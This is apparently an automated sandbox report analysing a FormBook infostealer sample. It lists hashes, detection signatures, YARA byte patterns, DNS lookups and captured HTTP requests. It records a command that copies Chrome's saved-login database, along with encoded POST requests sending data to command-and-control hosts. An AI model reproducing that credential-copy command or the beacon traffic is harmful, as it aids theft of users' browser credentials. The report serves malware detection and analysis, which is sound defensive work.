Loading ...

Play interactive tourEdit tour

Analysis Report bXdiOPDmyZ.exe

Overview

General Information

Sample Name:bXdiOPDmyZ.exe
MD5:c50f6a19b90539cf83a0637f739982f9
SHA1:51b1635e0e1e2ff1d150958ef27fa80b5ffb5bb2
SHA256:c0f5f94b8f695e7c5a4b6884ff1a122a2122ae1ed4e2a28a8c5470bbe957fa5a

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Antivirus detection for sample
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Creates autostart registry keys with suspicious names
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1597b:$sqlite3step: 68 34 1C 7B E1
    • 0x15a8e:$sqlite3step: 68 34 1C 7B E1
    • 0x159aa:$sqlite3text: 68 38 2A 90 C5
    • 0x15acf:$sqlite3text: 68 38 2A 90 C5
    • 0x159bd:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15ae5:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x740a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7674:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12cf7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x127e3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12df9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12f71:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x81ec:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x11a5e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8b85:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18069:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1906c:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x157b9:$sqlite3step: 68 34 1C 7B E1
      • 0x158cc:$sqlite3step: 68 34 1C 7B E1
      • 0x157e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1590d:$sqlite3text: 68 38 2A 90 C5
      • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 32 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.bXdiOPDmyZ.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.bXdiOPDmyZ.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x149b9:$sqlite3step: 68 34 1C 7B E1
        • 0x14acc:$sqlite3step: 68 34 1C 7B E1
        • 0x149e8:$sqlite3text: 68 38 2A 90 C5
        • 0x14b0d:$sqlite3text: 68 38 2A 90 C5
        • 0x149fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
        2.2.bXdiOPDmyZ.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        18.2.ntbhcfw6lm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          18.2.ntbhcfw6lm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x149b9:$sqlite3step: 68 34 1C 7B E1
          • 0x14acc:$sqlite3step: 68 34 1C 7B E1
          • 0x149e8:$sqlite3text: 68 38 2A 90 C5
          • 0x14b0d:$sqlite3text: 68 38 2A 90 C5
          • 0x149fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 1 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 4976, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 1800

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exeAvira: detection malicious, Label: TR/Kryptik.zfyes
          Antivirus detection for sampleShow sources
          Source: bXdiOPDmyZ.exeAvira: detection malicious, Label: TR/Kryptik.zfyes
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exeVirustotal: Detection: 75%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exeMetadefender: Detection: 32%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exeReversingLabs: Detection: 86%
          Multi AV Scanner detection for submitted fileShow sources
          Source: bXdiOPDmyZ.exeVirustotal: Detection: 75%Perma Link
          Source: bXdiOPDmyZ.exeMetadefender: Detection: 32%Perma Link
          Source: bXdiOPDmyZ.exeReversingLabs: Detection: 86%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: bXdiOPDmyZ.exeJoe Sandbox ML: detected
          Source: 17.0.ntbhcfw6lm.exe.400000.0.unpackAvira: Label: TR/Kryptik.zfyes
          Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.0.ntbhcfw6lm.exe.400000.0.unpackAvira: Label: TR/Kryptik.zfyes
          Source: 0.0.bXdiOPDmyZ.exe.400000.0.unpackAvira: Label: TR/Kryptik.zfyes
          Source: 2.0.bXdiOPDmyZ.exe.400000.0.unpackAvira: Label: TR/Kryptik.zfyes
          Source: 18.2.ntbhcfw6lm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 4x nop then pop edi2_2_004140CD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi4_2_009540C4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi19_2_003B40CD

          Networking:

          barindex
          Tries to resolve many domain names, but no domain seems validShow sources
          Source: unknownDNS traffic detected: query: www.rosedarte.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.vogahnews.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.happyhage.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.diffcomplex.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ugrejr.win replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.xn--fiqw6ol9bis7g.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.etoufu.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hongsemall.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.angelika-dorn.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.bbbav62621.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.xylemco.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.sewamobildanbus.com replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=5GGoshPm8DtXJbtv0j0CpM0ZScDouSGJSOqUOJNMNiXSV7FSaO+82pviX4ynrFwNCgG8 HTTP/1.1Host: www.abblaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=jmVQmi4sjS7ih7V2IoNMh1SkeFqY0dJymV2JACzQPE/qHepWmAmodPcElCzP+DKsrkIQ HTTP/1.1Host: www.poyik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?8pFL=LUR8/txceBDtIKNXLiQMutYOIYoLpa/yZvZq3kQ0sBAXqAM4bNfHWEKMD4Yt5BclzbK7&ers=Ml54sjKpKXO8nzrP HTTP/1.1Host: www.zabierzowska.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?8pFL=oCU8qkR86wHM4cE0Nkw8zeB5R9pLzrdrR6drjm45vOC9QNVBuIjVP0TQIAKENpCxedHo&ers=Ml54sjKpKXO8nzrP HTTP/1.1Host: www.worldinnovativesolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=5GGoshPm8DtXJbtv0j0CpM0ZScDouSGJSOqUOJNMNiXSV7FSaO+82pviX4ynrFwNCgG8 HTTP/1.1Host: www.abblaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.poyik.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.poyik.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.poyik.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 72 45 5a 71 34 47 78 4b 72 30 50 68 35 6f 49 64 65 73 67 44 7e 78 33 47 55 33 79 6d 38 75 52 4f 7a 77 54 4c 57 69 54 71 47 31 28 75 48 74 6c 39 32 51 48 79 57 34 68 79 30 46 62 75 30 79 69 35 69 32 4a 6f 68 63 6e 32 38 74 30 39 56 4e 66 73 61 48 33 4d 59 4c 48 58 68 30 6e 75 6f 30 6c 47 35 6b 59 44 67 45 7a 5f 30 72 4a 68 31 63 28 35 36 72 4f 6b 67 46 6d 38 50 66 37 6e 62 6f 77 6b 38 61 31 51 49 63 66 62 6d 38 44 59 7e 76 74 6e 4a 6a 53 39 72 51 4c 69 48 77 6a 7a 54 33 35 33 78 56 48 49 45 78 59 4e 73 72 59 75 78 42 7e 5a 4a 34 38 56 75 76 5a 69 36 57 48 4f 45 55 56 74 62 44 48 6c 72 59 79 6e 4a 36 35 37 77 65 31 48 36 2d 6a 48 55 64 6b 56 35 4d 39 42 58 4b 62 38 33 58 55 5a 41 6c 71 6a 63 36 4d 78 6c 79 41 35 4d 7a 47 69 7a 6d 44 77 37 71 53 44 55 4a 41 72 75 77 48 52 4a 65 37 50 4a 32 69 38 70 62 4c 31 41 6b 7e 61 63 65 55 30 4e 51 37 68 51 78 76 77 74 79 54 69 57 53 51 51 65 52 77 73 73 53 48 52 49 62 72 64 65 63 65 75 4b 30 56 73 77 75 50 6a 4d 71 44 37 48 52 51 38 74 75 65 32 76 67 64 39 55 4e 43 77 34 6d 77 38 72 61 73 46 73 55 74 69 51 35 6b 45 7e 31 50 44 43 4b 4d 43 50 6f 51 68 6b 45 70 63 54 5f 61 4a 43 69 58 49 6b 51 66 35 56 4f 28 55 6a 4a 77 2d 61 36 35 5a 66 35 45 31 47 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pFL=rEZq4GxKr0Ph5oIdesgD~x3GU3ym8uROzwTLWiTqG1(uHtl92QHyW4hy0Fbu0yi5i2Johcn28t09VNfsaH3MYLHXh0nuo0lG5kYDgEz_0rJh1c(56rOkgFm8Pf7nbowk8a1QIcfbm8DY~vtnJjS9rQLiHwjzT353xVHIExYNsrYuxB~ZJ48VuvZi6WHOEUVtbDHlrYynJ657we1H6-jHUdkV5M9BXKb83XUZAlqjc6MxlyA5MzGizmDw7qSDUJAruwHRJe7PJ2i8pbL1Ak~aceU0NQ7hQxvwtyTiWSQQeRwssSHRIbrdeceuK0VswuPjMqD7HRQ8tue2vgd9UNCw4mw8rasFsUtiQ5kE~1PDCKMCPoQhkEpcT_aJCiXIkQf5VO(UjJw-a65Zf5E1Gw).
          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.poyik.comConnection: closeContent-Length: 141254Cache-Control: no-cacheOrigin: http://www.poyik.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.poyik.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 72 45 5a 71 34 48 35 30 6d 6b 36 35 39 62 77 30 65 2d 4e 56 31 77 62 45 52 77 61 31 31 64 73 33 36 44 57 4f 57 69 6a 6d 66 68 79 68 51 4e 56 39 6e 69 75 36 4f 49 68 78 77 31 62 70 77 79 75 52 67 6d 78 67 68 59 33 63 38 74 38 36 61 73 4f 6f 61 58 32 4d 59 72 36 69 77 6c 43 79 6f 78 6c 6a 35 47 55 68 73 6b 50 5f 72 50 74 6a 78 39 76 59 7a 4b 43 64 7e 46 36 7a 4a 65 43 33 59 66 34 32 75 34 4a 6d 4a 5a 48 64 69 4f 65 55 77 4f 64 44 4e 78 79 79 30 51 66 35 43 78 6d 33 57 55 74 7a 77 6b 48 41 41 41 59 4b 6c 37 41 67 39 6a 6d 5f 63 61 4d 67 73 38 52 32 36 58 4f 37 66 33 78 42 4e 79 4c 74 73 35 28 43 51 66 5a 35 38 50 31 66 77 59 33 51 62 39 30 36 32 6f 74 52 53 61 6e 54 35 31 74 63 64 52 4f 79 50 34 6f 74 74 6d 46 5a 42 43 54 76 73 54 4b 69 7e 74 50 56 65 36 34 6a 74 79 71 34 48 65 36 70 4c 32 69 67 68 36 33 42 4b 31 32 52 49 5f 6b 57 4e 54 62 36 46 51 48 54 75 33 54 32 59 58 38 42 63 67 59 6f 30 51 28 74 59 34 47 66 57 4f 43 4f 4f 30 56 33 30 73 6e 6f 4d 71 44 33 48 51 51 57 73 61 57 32 76 77 39 75 55 72 4b 38 36 6d 77 62 74 4b 39 44 31 57 70 79 51 35 38 45 34 58 6e 74 44 35 38 43 5a 71 6b 6d 71 46 70 63 65 76 61 4a 4f 43 57 76 73 68 65 63 53 76 6a 76 74 38 41 73 66 63 55 2d 58 34 39 2d 62 54 52 69 49 31 79 37 5a 37 7e 4d 6a 6d 50 73 58 69 77 4a 5a 75 33 44 43 34 31 63 43 44 45 75 33 48 4f 5a 69 49 38 55 65 74 6f 76 68 75 28 73 75 78 6b 37 52 63 59 43 68 6b 77 69 46 59 64 45 63 35 68 78 43 34 38 30 6f 4e 39 74 64 66 33 6b 59 6d 41 68 33 63 59 68 50 4b 5a 51 6a 5f 4d 42 34 4a 65 5f 42 74 52 51 28 62 6d 75 51 31 4c 62 6a 5a 58 55 6a 4f 35 47 65 38 63 6b 6a 66 6b 67 4a 6e 42 62 50 4b 77 4d 4d 6a 59 35 51 73 4e 77 30 71 41 5a 47 44 44 73 43 76 5a 54 48 54 48 5a 49 30 47 47 47 6d 64 51 76 6a 52 64 52 78 56 5a 6e 46 56 49 79 72 7e 61 6e 64 45 34 7a 4e 6c 70 4a 43 44 34 46 75 6b 53 7a 46 6a 4a 73 79 34 69 72 64 6c 33 46 69 70 4f 4e 70 56 46 36 73 77 56 71 77 79 52 59 5a 6d 36 62 57 59 79 6f 70 42 6c 31 58 32 35 7a 4e 69 5a 62 43 53 76 4e 71 79 45 4e 79 28 34 34 76 7a 6f 56 38 7e 4c 75 56 56 4a 6c 64 50 6e 57 74 75 6a 28 30 64 5a 42 38 6f 66 48 61 46 4c 6f 72 59 44 75 61 61 65 7e 71 6f 31 6b 50 79 59 61 70 77 77 6f 35 42 65 41 51 74 61 30 75 4e 72 67 53 33 6d 61 39 70 52 4f 68 64 5f 39 34 69 63 52 62 65 4b 71 61 54 66 45 4e 65 35 41 35 50 68 58 49 56 51 73 51 57 68 7a 68 62 54 51 7a 62 63 61 4d 75 45 64 66 71 55 67 30 4e 6f 34 76 31 77 31 39 53 5f 7a 63 68 48 56 6d 77 47 4f 44 31 59 35 44 69 57 4e 59 44 69 74 6e 32 6e 47 62 61 57 71 6d 4f 44 52 4a 4b 71 72 31 31 74 79 6e 56 74 65 33 59 67 71 64 36 6d 37 78 4f 74 6b 65 6d 44 31 54 73 46 4e 6e 65 78 72 6b 45 41 75
          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.zabierzowska.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.zabierzowska.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zabierzowska.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 44 32 64 47 68 4c 77 4f 59 42 79 6f 64 6f 73 57 52 33 35 4c 7a 36 6f 51 45 6f 6b 4f 69 4c 7a 4f 49 66 49 79 70 47 41 56 6c 55 77 63 71 6b 4d 54 56 64 47 45 45 56 7a 57 55 62 41 76 78 43 6f 5a 75 4c 62 75 76 49 51 47 32 49 42 49 35 44 32 6f 6e 5f 75 4c 5a 38 37 78 4b 59 68 66 73 70 4c 37 34 4e 35 6c 68 34 4b 75 55 4e 72 76 46 68 59 45 4b 68 70 4c 32 4f 79 72 56 39 63 2d 48 70 37 36 59 30 38 41 64 51 52 65 6b 74 6a 61 74 7a 5a 4b 72 73 69 56 46 31 34 4d 6d 39 33 61 75 49 58 35 78 59 6b 79 54 6f 75 73 70 38 69 43 38 71 79 46 77 79 6c 55 54 65 67 49 75 4d 42 43 39 59 5a 2d 48 4b 42 66 51 4d 61 43 6f 6d 79 66 6d 49 4e 78 4e 74 62 57 59 69 6f 4a 63 57 45 46 67 6b 76 79 6d 34 4d 6a 31 56 72 4c 53 6a 61 34 77 39 72 68 28 49 43 64 6a 67 44 77 6c 58 71 7a 71 6a 76 35 74 30 62 75 6d 66 30 78 7e 63 6c 49 38 34 77 6c 44 54 6e 4a 4a 4f 4c 5a 76 6a 51 61 63 74 6e 37 68 46 70 2d 6a 61 72 6b 33 5f 44 57 46 69 55 35 69 4a 47 39 6c 75 64 35 70 66 57 75 43 63 54 35 39 35 72 36 49 71 46 68 70 41 32 63 32 4a 52 35 73 61 67 4b 62 4c 36 55 63 2d 44 30 69 35 71 78 42 4c 64 6e 74 50 47 69 43 66 4e 63 69 4f 35 66 66 67 66 6d 4a 4f 56 4c 30 30 76 42 46 64 54 65 66 6b 5a 49 54 48 41 57 48 6f 54 4b 38 6f 47 66 53 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pFL=D2dGhLwOYByodosWR35Lz6oQEokOiLzOIfIypGAVlUwcqkMTVdGEEVzWUbAvxCoZuLbuvIQG2IBI5D2on_uLZ87xKYhfspL74N5lh4KuUNrvFhYEKhpL2OyrV9c-Hp76Y08AdQRektjatzZKrsiVF14Mm93auIX5xYkyTousp8iC8qyFwylUTegIuMBC9YZ-HKBfQMaComyfmINxNtbWYioJcWEFgkvym4Mj1VrLSja4w9rh(ICdjgDwlXqzqjv5t0bumf0x~clI84wlDTnJJOLZvjQactn7hFp-jark3_DWFiU5iJG9lud5pfWuCcT595r6IqFhpA2c2JR5sagKbL6Uc-D0i5qxBLdntPGiCfNciO5ffgfmJOVL00vBFdTefkZITHAWHoTK8oGfSQ).
          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.zabierzowska.comConnection: closeContent-Length: 141254Cache-Control: no-cacheOrigin: http://www.zabierzowska.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zabierzowska.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 44 32 64 47 68 4b 6f 38 61 78 28 6b 58 36 45 46 65 46 56 6d 39 36 55 53 42 72 77 6a 76 37 4b 33 49 49 59 69 70 46 59 52 38 41 55 43 37 55 63 54 54 59 71 39 51 6c 7a 56 63 37 41 77 31 43 6b 74 77 4d 48 32 76 4a 6b 34 32 49 4a 4c 77 68 76 44 67 76 75 63 59 63 32 41 64 49 30 4e 73 73 4c 65 34 75 55 67 30 49 47 75 5a 64 7a 74 59 77 49 68 61 7a 4e 49 6f 76 65 71 47 39 30 64 48 36 4f 50 62 54 67 69 61 56 4a 63 6a 64 62 46 7a 6d 52 79 75 2d 43 67 4c 46 38 48 34 4f 4c 33 6a 4a 4b 2d 77 5a 6c 52 63 4a 75 76 33 63 61 41 70 5a 72 34 31 44 68 74 56 4f 51 32 75 4d 35 34 6c 36 4d 79 44 4e 4a 58 54 35 75 34 6e 30 43 6e 70 5a 4e 35 62 59 4f 77 61 69 34 32 41 6e 31 42 73 55 44 6a 6c 39 41 7a 78 41 4c 65 58 58 4b 6b 6f 5f 79 49 37 66 61 56 75 41 7a 50 6f 30 37 31 28 6a 50 78 7e 42 72 59 34 50 31 6c 38 63 6c 45 30 59 42 61 56 51 4b 45 4a 61 50 6a 76 67 67 4e 53 65 79 39 69 44 70 41 7e 49 44 66 77 4e 44 53 4f 33 59 52 79 75 7e 4d 6a 64 42 4e 32 50 57 44 66 4f 72 49 39 35 71 46 49 76 35 66 70 30 7e 63 32 64 4e 54 74 35 34 4f 5a 4c 36 56 50 65 7a 36 70 72 50 71 42 4c 56 6e 73 5f 32 59 54 34 70 63 78 73 68 59 52 6c 72 6d 49 65 56 4c 34 55 76 52 55 5f 69 68 61 45 51 47 62 6d 31 6a 59 38 75 62 76 63 48 36 41 43 55 66 6d 43 68 6f 6b 65 4b 5f 33 32 62 6d 43 31 6d 74 33 39 48 6e 59 6f 32 36 78 55 6b 42 53 5a 78 42 6d 77 68 48 57 4b 64 39 79 4e 34 36 46 47 66 5a 66 39 77 44 73 4d 6a 42 54 51 48 53 42 6a 28 63 44 62 6e 43 73 63 6e 62 69 35 64 49 4c 2d 78 6c 34 68 76 59 50 35 72 42 50 7a 72 5a 78 68 55 4a 4f 4f 38 63 4d 58 32 34 66 32 45 4a 34 30 41 32 52 6c 53 49 73 4a 35 58 69 69 41 46 43 67 31 79 39 4a 77 50 43 62 67 59 72 50 58 44 47 70 6e 5a 64 2d 6a 70 65 5f 71 4d 77 58 52 42 6e 54 34 30 68 57 38 51 6f 57 75 62 76 63 37 64 51 7a 30 2d 38 6d 79 4f 72 69 65 57 61 73 6a 72 74 6f 78 58 67 53 32 6d 4e 61 51 59 31 45 55 51 42 77 65 68 7e 6c 77 32 48 36 54 69 35 4d 54 39 54 4a 30 48 61 71 4f 6a 43 77 4a 4e 4e 65 4c 56 47 5f 4d 44 33 62 67 4c 47 36 72 39 41 2d 47 6e 4e 6b 28 4d 71 4d 6d 78 63 61 67 6a 4d 71 6d 6a 62 46 6b 32 50 47 56 6e 47 44 4e 42 4d 54 67 68 43 6f 55 64 4e 52 56 79 74 4f 6e 5a 79 7a 61 74 58 38 6a 56 68 6a 79 4d 74 77 63 31 4b 62 54 76 4a 49 36 34 28 71 67 64 6d 62 50 4a 41 47 28 61 35 63 44 65 48 5a 50 62 6d 79 48 4d 6f 68 79 51 78 2d 39 2d 56 6c 6f 4c 54 6f 78 6d 44 56 62 56 33 39 64 43 65 53 69 37 32 7a 6a 33 6e 44 28 75 6d 53 55 38 39 54 52 7a 4d 6a 73 4d 42 39 63 70 41 7a 30 78 30 64 59 58 69 32 4c 58 79 76 46 43 28 4d 30 4f 70 72 4c 74 66 39 59 4a 41 4d 7a 62 79 4b 48 50 4f 73 46 61 65 72 47 32 42 45 32 79 6d 61 52 64 51 4c 32 5f 31 42
